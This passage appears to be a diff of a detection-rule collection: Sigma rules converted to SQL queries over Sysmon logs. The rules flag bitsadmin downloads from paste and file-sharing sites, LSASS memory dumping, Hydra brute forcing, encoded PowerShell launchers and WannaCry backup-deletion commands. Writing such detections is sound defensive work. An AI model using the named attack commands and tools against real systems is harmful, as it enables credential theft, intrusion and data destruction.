+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR 
Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects exeuctable names or flags used 
by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects inline windows shell commands 
redirecting output via the \">\" symbol to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate admin scripts" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + }, + { + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * 
FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": 
"c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", + "attack.command_and_control", + "attack.t1059.003", "attack.t1059.001", - "attack.t1564.003" + "attack.t1105" + ], + "falsepositives": [ + "High" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_cmd_http_appdata.yml" + }, + { + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "falsepositives": [ + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o 
(New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Exotic software" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image 
LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, 
Florian Roth", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "WannaCry 
Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE 
'\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
